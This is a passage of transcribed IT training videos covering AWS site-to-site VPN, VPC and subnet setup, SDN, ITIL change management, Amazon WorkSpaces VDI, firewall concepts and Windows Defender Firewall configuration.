So that's usually done with a few clicks of a mouse, to be honest. Next, you create a VPN connection that links
the two appliances together and that's where you would have some details. About how the tunnel is established
and how authentication works and which IP addresses might be assigned to connecting clients and so on.
Learn how to connect an on-premises network to the Amazon Web Services cloud.
Objectives
link an on-premises network to the Amazon Web Services cloud
[Video description begins] Topic title: Cloud Site-to-site VPN Deployment. The presenter is Dan
Lachance. [Video description ends]
In this demonstration, I'll be configuring a site-to-site VPN. So specifically, the goal here is to link an on-
premises network with the AWS cloud environment using an encrypted VPN tunnel.
[Video description begins] A web page called "AWS Management Console" opens. [Video description ends]
So in order to do this, you have to know a few things. For example, you have to have access to manage AWS
in the first place. I'm already signed in to the Management Console. But you would also have to know things
like the public IP address of your on-premises VPN appliance. So let's get started here by searching for vpc,
which stands for Virtual Private Cloud. VPCs are everything networking in the AWS cloud, which is why I
want to launch that console.
[Video description begins] He clicks a link called "VPC" and a web page called "VPC Management Console"
opens. [Video description ends]
Because in the VPC Management Console, besides the standard VPCs or virtual networks and subnets defined
here in the cloud, you scroll down far enough in the left-hand navigator, you'll see Virtual Private Network
(VPN). The first thing I'm going to do is create a customer gateways. So I'll click that on the left and I'll click
the button at the top.
[Video description begins] He clicks an option called "Customer Gateways" and the corresponding page
opens in the content pane. He clicks a button called "Create Customer Gateway". A page called "Create
Customer Gateway" opens. [Video description ends]
Customer gateway represents your on-premises VPN appliance. So I'm going to call this CustomerGW-
Central1. The type of on-premises VPN appliance you're using will determine whether you support dynamic or
static routing. So that if you've got an on-premises VPN hardware appliance and it supports Border Gateway
Protocol or BGP, then you can go ahead and enable Dynamic routing. However, otherwise you can leave it on
Static. Let's say I've got an on-premises Windows Server configured as a VPN appliance. So I have to know
the public facing IP address on-premises of that device. So I'm going to put here let's say, 200.1.1.1. That is a
public IPv4 address. Next, we can choose a PKI certificate if we want to use that to secure authentication with
the VPN tunnel. I don't have that, so I'm just going to go ahead and click Create Customer Gateway.
[Video description begins] He clicks a button called "Create Customer Gateway". [Video description ends]
It says, it succeeded and I can see the configuration here for it.
[Video description begins] He clicks a button called "Close". [Video description ends]
There it is, CustomerGW-Central1. Now the next thing I need to do is define the other side of the VPN
connection. It's a two-way street. To set up a tunnel site-to-site, you need to have a configuration for VPN
appliances on both sides of the connection. So that's called a Virtual Private Gateway here in Amazon Web
Services.
[Video description begins] The corresponding page opens. [Video description ends]
So I'm going to click on that view on the left and I'm going to click the Create Virtual Private Gateway button.
[Video description begins] A page called "Create Virtual Private Gateway" opens. [Video description ends]
And I'm going to call this VPGW, Virtual Private Gateway1. And I can determine whether I want to use the
Amazon default Autonomous System Number or ASN versus a Custom ASN. I'm going to leave it on the
Amazon default Autonomous System Number or ASN and then I'll choose Create Virtual Private Gateway and
it's here.
[Video description begins] He clicks a button called "Create Virtual Private Gateway". He further clicks a
button called "Close". [Video description ends]
However, it is currently detached. So what we now need to do then, is we need to make sure that we link the
customer gateway with the Virtual Private Gateway. We do that with the Site-to-Site VPN Connections.
[Video description begins] The corresponding page opens. [Video description ends]
So I'm going to click on that view on the left and I'll click Create VPN Connection.
[Video description begins] He clicks a button called "Create VPN Connection" and the corresponding page
opens. [Video description ends]
So I'm going to call this SiteA_AWS_VPN. And it's going to be Virtual Private Gateway. So I have to choose
the Virtual Private Gateway from the list. We just defined it, it's called VPGW1.
[Video description begins] He clicks a drop-down list box called "Virtual Private Gateway" and selects an
option called "vqw-000826ec4721ec2d9". [Video description ends]
Now, for the Customer Gateway, we already have an existing one defined. So I'm just going to choose it from
the list here, that's my CustomerGW-Central1.
[Video description begins] He clicks a drop-down list box called "Customer Gateway ID" and selects an
option called "cqw-03adf7f008cef9a8d". [Video description ends]
And down below, I can determine if I want to use Dynamic or Static routing. Now, your on-premises
appliance, your VPN appliance, needs to support Border Gateway Protocol or BGP, if you want to use
Dynamic routing. So let's say, no, we don't have that support, then we could choose Static and start entering in,
static IP address prefixes. I'm going to leave it on Dynamic for this VPN link. And down below, I can specify
if I choose some CIDR IP address ranges. And also the preshared key, notice it wants to make two tunnels that
would be used, the PSK to authenticate both ends of the connection, so we have a tunnel that's up and running.
But I'm going to let it all be generated by Amazon. You can see that's what is set here, I'm going to use all the
defaults, and I'm going to click Create VPN Connection, and then I’ll close out.
[Video description begins] He clicks a button called "Create VPN Connection". He further clicks a button
called "Close". [Video description ends]
And we now have a VPN site-to-site link. Now, the State is listed as pending and it will until such point that a
connection is actually made between the two VPN appliances. Then notice at the top here, we've got a
Download Configuration button.
[Video description begins] He clicks a button called "Download Configuration" A dialog box called
"Download Configuration" opens. [Video description ends]
Let's say that on-premises, we've got a Cisco specific Cisco series type of platform running our VPN
appliance.
[Video description begins] He clicks a drop-down list box called "Vendor" and selects an option called "Cisco
Systems, Inc.". [Video description ends]
So we can select that and the software revision number and download the configuration file that we could use
on that device.
[Video description begins] He clicks a drop-down list box called "Platform" and selects an option called "ASA
5500 Series". [Video description ends]
In this video, find out how to design a networking strategy for the cloud.
Objectives
[Video description begins] Topic title: Cloud Networking. The presenter is Dan Lachance. [Video description
ends]
Software Defined Networking or SDN is a phrase that you'll hear often coupled with cloud computing,
specifically with infrastructure as a service or IaaS at the network level. So the idea with SDN is to hide the
underlying technical complexities from the cloud user that's making a network configuration. And then letting
the underlying hardware actually make it all happen. With software defined networking, we really have a layer,
whether it's allowing the GUI or CLI interface to create this configuration in the cloud for the network.
We've got this SDN layer that sits between the user and the underlying physical network devices. So it makes
it easier. Instead of a user defining a subnet and having to know how to do that at the Cisco IOS command-line
level. Instead, they might just have a friendly web GUI, they enter in a few things, click a few buttons, and
then it's done. That's where SDN kicks in. So it allows for the configuration of underlying infrastructure
devices like routers, switches, gateways, that type of thing.
The other thing to think about is that in the cloud there are multiple network configurations that we might work
with that use SDN. So configuring the VPNs in the cloud, maybe to link an on-premises network to the cloud
or for remote client connectivity. That can be done very easily with command line tools or through a GUI
without knowing the actual underlying complexities. We also have to think about the number of virtual cloud-
based networks we want to have. And the IPv4 or IPv6 address ranges that we want to use and maybe even any
custom routes. So maybe to forward traffic coming in from the Internet first to a firewall appliance for
inspection before allowing the traffic in. All of these things we'd have to plan for and can configure using
software defined networking without knowing how to actually configure those settings on the underlying
network infrastructure hardware. That would also include things like network traffic firewall rules, through
access control lists or ACLs.
[Video description begins] Virtual Private Cloud (VPC). [Video description ends]
Consider the example of a Virtual Private Cloud or a VPC in Amazon Web Services in the cloud. So we can
support an IPv4 CIDR block that can be configured, so an address range for that network environment in the
cloud, or it could be an IPv6 block. Now this would be allowing us to define a virtual network in the AWS
cloud, again, without actually having to connect to physical hardware to configure virtual LANs, VLANs, and
so on.
And when you configure a VPC in the Amazon Web Services cloud, there are a number of network
configuration items that go along with that. Like the number of subnets that you're going to deploy and the
range of IP addresses that will be available for each subnet. DHCP options, whether you want to use DHCP or
not. Configuring network ACLs, in other words, subnet firewall rules to control traffic flow into and out of the
subnet in the cloud. Routing table entries to control traffic flow. Even tagging, adding extra metadata perhaps
to tie network configurations in the cloud to departments, regions, or cost centers, that type of thing.
Managing cloud network components can be done with GUI tools, with templates. Templates are great in that
you can actually define more than one type of cloud resource. In a template, you might define a network in the
cloud, a couple of subnets, a couple of virtual machines, a database server, a storage bucket, and so on, all
within a single template. Of course, you could have a single template that deploys a single virtual network in
the cloud. You can also use scripts because there are always command line tools, such as using a Command
Line Interface, a CLI or PowerShell cmdlets, that allow you to create and manage cloud network resources
through SDN. All of this is available.
The network in the cloud that you work with, can consist of VLANs and VNets. Now what this really means is
at the underlying network level you might actually be configuring a VLAN. But at the cloud level that you
interact with, it might be called a VNet or Virtual Network or a Virtual Private Cloud, a VPC. Either way,
when you define a virtual network in the cloud, you're going to have to define DNS settings. In other words, do
you want to use cloud provider DNS servers for name resolution, or do you want to use custom DNS servers?
As might be required if you're configuring your own services like Microsoft Active Directory manually in the
cloud. You also would have to determine if you want to configure specific DHCP options for devices that
receive their IP configuration automatically in the cloud. When we say devices, we're really simply talking
about cloud-based virtual machines.
[Video description begins] Topic title: Cloud VPC Deployment. The presenter is Dan Lachance. [Video
description ends]
In Amazon Web Services, a VPC, or Virtual Private Cloud, is simply a virtual network that you define in the
AWS Cloud environment. Now, you would plan this ahead of time, thinking about how many subnets you will
need within that VPC, their IP address ranges. And which type of services you will be deploying into those
subnets. Such as databases or custom virtual machines that you configure yourself.
[Video description begins] A web page called "AWS Management Console" opens. [Video description ends]
To get started here in the AWS Management Console, I'm going to search for vpc. And I'll click VPC, which
will open the VPC Management Console.
[Video description begins] A web page called "VPC Management Console" opens. [Video description ends]
When I click VPCs on the left, I'll see any existing VPCs. We've got one called VPC1.
[Video description begins] He clicks an option called "Your VPCs" in the navigation pane and the
corresponding page opens. [Video description ends]
I'm going to create a new one, so I'm going to click Create VPC, and it's going to be called VPC2.
[Video description begins] He clicks a button called "Create VPC". A page called "Create VPC"
opens. [Video description ends]
Now, I need to assign it either an IPv4 or an IPv6 CIDR block. CIDR stands for Classless Inter-Domain
Routing. Its notation that looks like this. Let's say I want to use 15.0.0.0/16. What is that? Well, 15.0.0.0 is a
network address. The /16 notation, which is part of CIDR, is telling me how many bits are in the subnet mask
starting from the left. So it's the first 16 bits, the first 2 bytes, there are 8 bits in a byte. In other words, 15.0 is
the network address. Now, any subnets that I defined within the VPC have to use a CIDR block that falls under
15.0. I'm going to leave the Default tenancy, I don't need Dedicated hardware to house my VPC. And I'm
going to click Create.
[Video description begins] He clicks a button called "Create". [Video description ends]
And that's it. VPC is created that quickly.
[Video description begins] He clicks a button called "Close". [Video description ends]
And we can see it listed up here up at the top. However, what I want to do is define some other settings. Now,
there are a lot of settings already defined for it.
[Video description begins] He selects a VPC called "VPC2". The tabs labelled "Description", "CIDR Blocks",
"Flow Logs", and "Tags" are displayed. [Video description ends]
See, if you have a VPC selected down below under Description, it's got this Network ACL thing associated
with it. I can click that link to open up that view.
[Video description begins] He clicks a Network ACL called "acl-05318cd3d0cdf9663" in the Description
tab. [Video description ends]
A network ACL has inbound and outbound rules that either Allow or Deny specific types of traffic.
[Video description begins] A new page opens. It includes a table with five columns and one row. The column
headers are Name, Network ACL ID, Associated with, Default, and VPC. It also includes tabs labeled
"Details", "Inbound Rules", "Outbound Rules", "Subnet associations", and "Tags". [Video description ends]
[Video description begins] He clicks the Your VPCs option in the navigation pane and the corresponding page
opens. [Video description ends]
It's also got a DHCP options set automatically associated with it. We didn't do that, it just happens.
[Video description begins] He clicks a DHCP options set called “dopt-da7843bd” in the Description tab. A
new page opens. It includes a table and tabs labeled "Details" and "Tags". [Video description ends]
And really, all that, that does is set things like the domain name that will be used and whether we're using
Amazon provided DNS name servers.
The other thing it does when you create a new VPC is it associates it with a routing table.
[Video description begins] He clicks the Your VPCs option in the navigation pane and the corresponding page
opens. [Video description ends]
So I've got a link for the route table here, where down below when it switches me to that view, I can see any
routes.
[Video description begins] He clicks a Route table option called “rtb-04c86882f478ea9d3” in the Description
tab. It includes a table and tabs labeled "Summary", "Routes", "Subnet Associations", "Edge Association",
"Route Propagation", and "Tags". [Video description ends]
And I can click Edit routes.
[Video description begins] He selects the Routes tab. [Video description ends]
And I can add custom routes, perhaps to things like Internet gateways to allow outbound Internet connectivity
and so on. So let's get back to VPC2.
[Video description begins] He clicks a button called "Edit routes" and the corresponding page opens. [Video
description ends]
[Video description begins] He clicks a button called "Cancel". [Video description ends]
Let's define a subnet within that range that will be linked with VPC2.
[Video description begins] He clicks the Your VPCs option in the navigation pane and the corresponding page
opens. [Video description ends]
[Video description begins] He clicks an option called "Subnets" in the navigation pane and the corresponding
page opens. He clicks a button called "Create subnet". A page called "Create subnet" opens. [Video
description ends]
It's going to be called VPC2_Subnet. And I'm going to tie that, of course, to VPC2, which I'll choose from the
list. And I'm going to specify, well, let's say I try this.
[Video description begins] He clicks a drop-down list box called "VPC" and selects an option called "vpc-
0ade256b9d107cd09". [Video description ends]
Let's say I try to put 15.1.0.0/16. When I click Create, it says that's not going to work, because your CIDR
range for this subnet is not within the CIDR range of the VPC. That's true, it's not under it. So what I could do
is something like this. Let's say I put in 15.0.1.0/24. In this case, I'm identifying that the first three bytes, first
24 bits, or the first three octets define the network. So in this case, the subnet network address is 15.0.1, 24-bit
mask, that's perfect. Let's go ahead and create that, it loved it. So I'm going to close that.
[Video description begins] He clicks a button called "Create" and further clicks a button called
"Close". [Video description ends]
And we can now see that we've got VPC2_Subnet. And we can see the address range. And we can even see the
available IPv4 addresses. You might say, well, mathematically, normally, with a subnet like this where you've
got the entire last octet to address hosts. You would have either 256 addresses available, assuming you're
allowed to use all binaries used once, or more commonly, 254. Why only 251 available? Because some IP
addresses are reserved internally by Amazon Web Services. So this is normal in this particular case. So at this
point when we start deploying resources, let's say we were to deploy a new virtual machine. So I'll go back to
the AWS main page.
[Video description begins] He switches back to the AWS Management Console web page. [Video description
ends]
Under All services, Compute, I'll click EC2, that's for virtual machine instances.
[Video description begins] The corresponding page opens. [Video description ends]
[Video description begins] He clicks an option called "Instances" in the navigation pane and the
corresponding page opens. [Video description ends]
I'll just quickly step through this to the point where I'm just going to keep clicking Next till we get to step
three.
[Video description begins] He clicks a button called "Launch Instance" and a page called "Step 1: Choose an
Amazon Machine Image (AMI)" opens. [Video description ends]
This is where we determine the network into which we want this resource deploy.
[Video description begins] He clicks a button called "Select" adjacent to an option called "Amazon Linux 2
AMI (HVM), SSD Volume Type". A page called "Step 2: Choose an Instance Type" opens. [Video description
ends]
[Video description begins] He clicks a button called "Next: Configure Instance Details". A page called "Step
3: Configure Instance Details" opens. [Video description ends]
That's VPC2_Subnet. And the setting for that subnet is to disable the autoassignment of public IPs.
[Video description begins] He clicks a drop-down list box called "Network" and selects an option called "vpc-
0ade256b9d107cd09 | VPC2". [Video description ends]
I could just override that here and enable that if I wanted to. But the point is, we can now deploy cloud
resources into our newly created VPC subnet.
In this video, you will identify how ITIL influences efficient service delivery, including change management
implementation.
Objectives
identify how ITIL influences efficient service delivery, including change management implementation
[Video description begins] Topic title: Change Management Procedures. The presenter is Dan
Lachance. [Video description ends]
Information Technology Infrastructure Library or ITIL is an IT service management best practice framework.
It answers questions such as how does IT fit into provide the best value in achieving business goals? So
overall, in a general sense, you could say that ITIL helps improve the quality and reliability of IT services. And
it also means having effective IT practices that are efficient from a cost perspective that effect the bottom line
in a positive way. The ITIL Lifecycle includes service strategy and service design. Service strategy would
include things like financial and demand management. And that would be related to a business process that has
underlying IT services that support it. It also includes business relationship management, and service
automation. Service design would deal with things like service catalog management, having a catalog of
services that are available. That would even include at the cloud self-provisioning level.
Having the capacity and availability to supply solutions that are requested from the catalog. Service design also
includes service continuity, disaster recovery planning, and incident response plans. Next we have service
transition and service operation phases in the ITIL Lifecycle. Service transition would include things like
change management. So going through the correct procedures and steps and authorizations before
implementing change. Which is really a focus of what we're going to talk about.
Then there's release and deployment management. Service testing to ensure it meets business requirements and
operational requirements. Service operation means monitoring over time, the health and the performance
metrics related to an IT solution. And managing incidents when they occur. That means having an incident
response plan in place ahead of time. It also means fulfilling any requests for IT services. Finally, we have
continual service improvement. This means measuring service performance metrics and availability
continuously.
There's a continual assessment and then continuous improvement based on the results of that assessment. This
is kind of like the fact that we need continuous monitoring, and at the worst level, even periodic monitoring of
security controls. To ensure their effectiveness at mitigating threat. So change management is all about
controlling risk and minimizing any potential disruptions. If there's a problem while the change is being
implemented. So with change management, we need to have standardized procedures for implementing
specific types of changes.
By doing this and by testing them thoroughly, we're reducing the risk related to the implementation of those IT
changes. And increasing the efficiency at which they take place. At the same time, we might also be directed in
our standard procedures for change management by compliance with laws and regulations. The other thing to
consider is a reduction of IT related downtime. Everybody wants zero downtime. That's not always possible.
But at least a reduction of the downtime and proper notification of stakeholders prior to the downtime is
something that we can do. So the focus here is on the process related to implementing the change, not
necessarily the change itself. It's about how it would be done. Because if you have a standardized process for
change management, it really doesn't matter what the change is. You'll be controlling it, going through the
proper approval levels to make sure you minimize risk.
So what are some types of IT changes? It could be at the hardware level, could be to software. It could be
changes to procedures, how we do something. Remember there's a continuous monitoring and continuous
improvement part of the ITIL Lifecycle. The changes might be applied at the network level, such as changing a
DHCP option that gets delivered to clients on the network.
[Video description begins] Change Management Event Flow. [Video description ends]
Now, the event flow for change management begins with a change request. Often this is done through a web
portal by an IT service technician or a department lead. Next, the change is evaluated. After it's approved, then
the change can be implemented and reviewed after the fact.
[Video description begins] The Change Management Event flow contains Change request creation, Change
request evaluation, Change request approval, and Change implementation and review. [Video description
ends]
Configuration management usually modifies what's already there, and it requires a configuration management
system, or CMS. The CMS consists of at least one configuration management database, or CMDB. Which in
turn contains one or many configuration items, or CIs. An example of a CI within a CMDB might be a record
that states that we have 100 licenses for a software product. And that can be compared by scanning and
performing a software inventory of what's actually out there. To see if we're in compliance or not based on the
number of licenses purchased.
So configuration management then has defined responsibilities for the tasks related to it just like change
management would. There is a verification of configuration item validity. Remember, in our example a
configuration item might be a record stating we have 100 licenses purchased for a piece of software. So
ensuring that that's correct. And then of course, having documentation for how changes were implemented.
This is always important and it feeds itself into continuous improvement. In this case for configuration
management.
After completing this video, you will be able to recognize the benefits of virtual desktop infrastructure.
Objectives
[Video description begins] Topic title: Virtual Desktop Infrastructure. The presenter is Dan Lachance. [Video
description ends]
Many decades ago, computer environments often included dumped terminals that would have a connection to a
centralized host that would have the horsepower to run the user sessions.
[Video description begins] Virtual Desktop Infrastructure (VDI). [Video description ends]
And in a way, we've come full circle with Virtual Desktop Infrastructure, VDI. VDI centrally hosts desktops
that you just connect to over the network from a variety of devices, even thin devices. Devices that have almost
no processing power and maybe not even in the local storage because it's all handled server side. So it allows
for client remote connectivity.
In our diagram, we see on the left a smartphone. This is an end user thin client device. The user could be using
a web browser or a small app that they've installed from an app store to allow connectivity to their desktop. For
example, in the cloud VDI infrastructure. So in the cloud, we can configure centrally hosted Linux or
Windows desktops. This allows the IT team to have centralized control of the configuration of the software in
the cloud. And also on the permission set that might be applied to, terminal users cannot do. And also, for
updating its all centralized as opposed to deploying updates to hundreds or thousands of computers that
actually have the entire software suite installed.
[Video description begins] Topic title: Cloud VDI Configuration. The presenter is Dan Lachance. [Video
description ends]
In this demonstration, I'll be configuring virtual desktop infrastructure or VDI in the Amazon Web Services
cloud. This will allow centralized Linux or Windows desktops that are managed and exist in the cloud to be
accessible to end user client devices. So how do we do this?
[Video description begins] A web page called "AWS Management Console" opens. [Video description ends]
Well, here in the AWS Management Console, I'm going to start by searching for WorkSpaces. That's what the
feature's called in AWS.
[Video description begins] He clicks a link called "WorkSpaces" and a page called "WorkSpaces"
opens. [Video description ends]
So first, I have to make the configuration here. Now, currently, we don't have any WorkSpaces. But if I go to
Directories, it's important that we have a directory service registered.
[Video description begins] He clicks an option called "Directories" in the navigation pane and the
corresponding page opens. [Video description ends]
I've got an Active Directory configuration here in Amazon Web Services, which is going to be used for user
authentication. And the domain is called quick24x7.local. But notice, under Registered it says, No. So having
this selected, I'm going to go to the Actions menu and choose Register.
[Video description begins] A dialog box called "Register directory d-906771189a" opens. [Video description
ends]
After which, I can specify the subnet affiliation for this, for availability. And down below, I'm not going to
change any of these items for Self Service Permissions or Amazon WorkDocs. I want those things both
enabled, so I'm going to go ahead and click Register.
[Video description begins] He clicks a button called "Register" and the dialog box closes. [Video description
ends]
Okay, it says REGISTERING and I can just click the refresh button here until such point that the registration
has completed. And it won't take long if you keep clicking the refresh button. So now, we can go over to
WorkSpaces.
[Video description begins] He clicks an option called "WorkSpaces" in the navigation pane and the
corresponding page opens. [Video description ends]
[Video description begins] A page called "Launch WorkSpaces" opens. It is divided into two parts. The first
part is a navigation pane and the second part is a content pane. The navigation pane contains the options
called "Step 1: Select Directory", "Step 2: Identify Users", "Step 3: Select Bundles", "Step 4: WorkSpaces
Configuration", and "Step 5: Review". The Step 1: Select Directory option is selected in the navigation pane
and the corresponding page is open in the content pane. [Video description ends]
[Video description begins] He clicks a button called "Next Step". The Step 2: Identify Users option is selected
in the navigation pane and the corresponding page is open in the content pane. [Video description ends]
I'm going to click Next Step, and I'm going to configure some Username details.
[Video description begins] He enters the text CBlackwell in a text box called "Username". [Video description
ends]
[Video description begins] He enters the text Blackwell in a text box called "Last Name". [Video description
ends]
So when I fill in the email for the account, it's going to create the account in my Active Directory domain here
in the cloud. So I can click Create Users, like keep adding multiple users to the list.
[Video description begins] He highlights the text "quick24X7.local". He clicks a button called "Create
Users". [Video description ends]
So down below, we've got our user listed, So I can click Next Step to proceed. And then I choose a bundle.
[Video description begins] He clicks a button called "Next Step". The Step 3: Select Bundles option is selected
in the navigation pane and the corresponding page is open in the content pane. [Video description ends]
The bundle, of course, is the collection of the operating system and app configuration for the user in their
desktop. I'm going to choose Standard with Windows 10, which gives me 2 vCPUs, 4GB of memory, and a
root volume and a user storage disk volume. So that's fine, I'm going to go ahead and use that. And then the
bottom right, I'll click Next Step.
[Video description begins] He clicks a button called "Next Step". The Step 4: WorkSpaces Configuration
option is selected in the navigation pane and the corresponding page is open in the content pane. [Video
description ends]
Finally, on the last page here, we have a number of options. Do we always want the virtual desktop running, so
you're going to be billed for that. Or should it Auto Stop after a certain period of time. I'm going to leave it on
Auto Stop after one hour. We can determine if we want to protect data at rest for the root and user data
volumes. And we can also add tags. I'm not going to add any tagging so at the bottom right, I'm going to click
Next Step.
[Video description begins] He clicks a button called "Next Step". The Step 5: Review option is selected in the
navigation pane and the corresponding page is open in the content pane. [Video description ends]
[Video description begins] He clicks a button called "Launch WorkSpaces". The WorkSpaces page is
displayed. [Video description ends]
After a moment, we can see we have a message your WorkSpaces is being launched. We can see it listed down
below, but the Status is PENDING. So we're going to wait here, we're going to kind of hang around and click
on the refresh button until the Status changes.
[Video description begins] Topic title: Cloud VDI Client Connections. The presenter is Dan Lachance. [Video
description ends]
Amazon WorkSpaces is a virtual desktop infrastructure or VDI solution in the AWS Cloud. It allows users to
use a thin client to connect to a centralized desktop that's hosted in the cloud. Whether the desktop is running
Windows or Linux and users can connect from a Chromebook or an iPad or an Android phone or a Mac or a
Windows device, it doesn't matter. And so when that's set up in Amazon Web Services, an email message will
be sent to whoever was associated with a specific WorkSpace or virtual desktop.
[Video description begins] He opens the Outlook and points to the email labeled "Your Amazon
WorkSpace". [Video description ends]
And this is what the email message looks like, it says it's your Amazon WorkSpace, and it talks about how to
complete the user profile and download the WorkSpaces client by following a link. Then launching the client
and entering the registration code specified here in the email. And then logging in with our user account. Now
this user account was specified when the WorkSpace was defined in Amazon Web Services. So I'm going to
go ahead and follow that link.
[Video description begins] A new web page opens and a dialog box called "Please set your WorkSpaces
credentials" is open. [Video description ends]
Now when I follow the link, it prompts the user to enter a password. So I'm going to go ahead and enter a new
password and then confirm it. So I'm going to go ahead and click the Update User button.
[Video description begins] A page called "amazon WorkSpaces" opens. [Video description ends]
And at this point, I am taken to a page where I can download the appropriate WorkSpaces client for my
platform. So in this case, I'm going to download it for Windows.
[Video description begins] He clicks a button called "Download" under an option called "Windows". [Video
description ends]
After you've downloaded it and installed it, if there are any updates, you'll be prompted to install any updates.
[Video description begins] He clicks a button called "Install update". A wizard window called "Amazon
WorkSpaces Setup" opens. [Video description ends]
And I can just go ahead and go through the default settings for getting this update installed. And after a
moment we're placed in our Amazon WorkSpace and it's as if we're running Windows on premises when
really, we're running it from being hosted in the AWS cloud.
Upon completion of this video, you will be able to list how different types of firewalls protect digital assets.
Objectives
[Video description begins] Topic title: Firewalls. The presenter is Dan Lachance. [Video description ends]
Firewalls remain an important technical control to limit what traffic is allowed into or out of hosts or networks,
depending on whether it's a host-based firewall or a parameter-based firewall on the edge of the network. So
we're talking about controlling traffic flow, whether it's a hardware firewall appliance, which could be a
specialized device that you plug into the network, or it could be built into a router by configuring firewall ACL
rules. At the software level, we could have OS based firewalls, such as those built into the Windows platforms
or even if you're using Linux, you might be using a firewall like UFW or iptables. You could have a virtual
machine appliance that's been tweaked and is dedicated to serving as a firewall appliance.
Now, if that's the case, usually it'll have two network interfaces, two virtual network interfaces. You could also
have an SDN or a Software-Defined Networking cloud-based firewall solution, such as a network security
group in the Amazon Web Services cloud computing environment. So when you're looking at firewalls, one of
the things to think about are the layers of the OSI model that the firewall applies to. You'll recall that the OSI
model is a seven layer conceptual model that we map communications hardware and software to.
So if we say that we've got a layer 3 firewall, we're talking about a firewall that can work with layer 2
hardware MAC addresses for devices and layer 3 IP addresses. If it's a layer 4 firewall, it has the ability to also
look at port numbers such as within TCP or UDP headers. If it's a layer 7 firewall, it can even go down into the
packet payload to make decisions about whether that traffic should be allowed or not. Stateful firewalls are
ones that don't only look at individual packets one by one, such as those coming in from the Internet to an
internal network, but instead, they look at a stream or a session that's related to numerous packets. A stateless,
of course, means it doesn't, it just looks at individual packets one by one, doesn't see a relationship between
multiple packets that comprise a session. So needless to say, having a state for firewall is more powerful and
more precise about allowing or determining traffic appropriately than a stateless firewall would be.
[Video description begins] Firewall Placement. [Video description ends]
Another important aspect of a firewall appliance is its placement, where is it? For example, in our diagram,
we've got the Internet at the top and an internal private network down at the bottom. Normally, in an enterprise
environment, we'll have a demilitarized zone, or a DMZ network. And in that network, we would place items
that should be publicly reachable. Things like web servers, or mail servers, or FTP servers. In the DMZ, we'll
also want to make sure that we have a firewall that controls traffic into it. So pictured on our diagram then, we
have three firewalls, one between the Internet and the DMZ.
Now, of course, there's also a firewall at the DMZ level and one of the private network level. So from the
Internet into the DMZ, the firewall rules might be a little bit more relaxed than they would be from the Internet
to the internal private network. So the placement is always going to be crucial when it comes to working with
network-based perimeter firewalls. Now technically, you should have a firewall on every computing device
where possible, including even smartphones. A firewall ACL is an access control list. It's a set of rules that
either determine that something is allowed or not allowed into a network or a host.
So there are many different components to a firewall rule, such as the direction, is it incoming or is it
outgoing? And not only that, but which interface does it apply to? What's the protocol type that we're allowing
or blocking? Maybe we're blocking ICMP traffic, which results from using commands such as traceroute and
ping, but we're going to allow IP traffic. Depending on the firewall, you might also be able to specify
additional higher level details. When we say a higher level, we're talking about higher levels in the OSI model.
So layers 5 through to 7, where we can look at things like usernames or device types, or IP addresses from
which connectivity is being established. And also the destination that someone is trying to reach.
[Video description begins] Inbound Firewall ACL Rules. [Video description ends]
The other thing to think about is what the ACL might look like. Here is an example, where in the leftmost
column, we've got the protocol, whether it's TCP, UDP, or Any to allow everything. Then we've got the port
number. Now, in some cases, you'll be able to specify both the source and the destination port, but usually, it's
the destination port that matters. So for example, if you're hitting a secured web server over HTTPS that's
TCP-based and you're looking at the target port of 443, now, the source port from a client web browser would
be a high leveled port that's usually randomly generated.
In other words, it's not always going to be the same for every session. So here, we have port numbers. Next, we
have the source, where is the connection being initiated from, and we can limit that. And then the destination,
what are we trying to connect to in the end? And then we have name for the rule and the action, whether it's
allowed or deny. So in the first example, we're allowing UDP port 53 traffic from anywhere to a specific
destination, that would be for a DNS query.
[Video description begins] The Destination of UDP is 192.16.10.200. [Video description ends]
Second example, TCP 80, 443 from anywhere to a specific host, would allow HTTP and HTTPS traffic to that
IP address.
[Video description begins] The Destination of TCP is 192.168.10.201. [Video description ends]
Third rule, TCP 3389 from an IT_Admin_IP_Range would allow access to any RDP hosts, so Windows hosts
with RDP enabled, for remote management. And at the bottom we're having an Any rule which is Deny. So
firewall issues or rules that are parsed from the top-down. And so if there are no matches in the first three
rules, then the last rule will kick in, which would block all traffic.
15. Video: Windows Firewall (it_cscysa20_10_enus_15)
[Video description begins] Topic title: Windows Firewall. The presenter is Dan Lachance. [Video description
ends]
Ever since Windows XP Service Pack 2, Windows operating systems have included a built-in firewall. So to
get started here on Windows Server 2019, I'm going to go to my Start menu and type in the word fire. Now
from here, I want to go in and configure the Windows firewall on this device. And I'm going to do it first of all
by just clicking Windows Defender Firewall.
[Video description begins] A window called "Windows Defender Firewall" opens and a page called "Help
protect your PC with Windows Defender Firewall" is open. [Video description ends]
Now what we can do from here is see which type of network we are connected to, that's called network
profiling, and which one of our network profiles are applicable for firewall rules.
[Video description begins] He points to options labeled "Domain networks", "Private networks", and "Guest
or public networks". [Video description ends]
Now for example, let's say that I'm on a Guest or public networks, it says Connected, and that's where we are.
Well notice the Windows Defender Firewall state is currently set to Off. So it's not on there. It's not on for
private or domain networks either. A domain network is one where the machine detects it's got a connection to
an Active Directory domain controller, in which case domain network would be selected. When you build a
firewall rule in Windows, you can determine whether the rule applies to one or all of these network profiles.
Now I want to turn Windows Defender Firewall on. So I'm going to click on that on the left and turn it on all
of these different networks.
[Video description begins] He clicks a link called "Turn Windows Defender Firewall on or off" and the
corresponding page opens. [Video description ends]
[Video description begins] He selects the checkboxes called "Turn on Windows Defender Firewall" under the
sections labeled "Domain network settings", "Private network settings", and "Public network settings". [Video
description ends]
Now when I do that, I can determine how the behavior will be for the firewall. I don't want to block all
incoming connections, including what's allowed. In other words, block all incoming, allow outgoing. No, I
don't want to do that. I want to allow some traffic in, such as for remote management, so I'm not going to do
that. We can also turn on notifications when Windows Defender blocks an app. And you can do that for each
of the network profiles. I'm not going to do anything other than turn on Windows Defender Firewall, which is
important.
[Video description begins] He clicks a button called "OK". The Help protect your PC with Windows Defender
Firewall page opens. [Video description ends]
So now it turns green. We know that that is turned on. Now I can go into Advanced settings, which would have
been the same thing as me going into Windows Defender Firewall with Advanced Security from the Start
menu to begin with.
[Video description begins] He clicks a link called "Advanced settings" and a window called "Windows
Defender Firewall with Advanced Security" opens. It is divided into five parts. The first part is a menu bar.
The second part is a toolbar. The third part is a navigation pane. It includes options labeled "Inbound Rules"
and "Outbound Rules". The fourth part is a content pane. The fifth part is a pane called "Actions". [Video
description ends]
And I have both inbound as well as outbound rules. Depending on what you've got installed on your host will
determine which rules may be present here.
[Video description begins] He clicks the Inbound Rules option in the navigation pane and the Inbound Rules
pane opens in the content pane. It includes a table with multiple rows and columns. The column headers
include Name, Group, and Profile. [Video description ends]
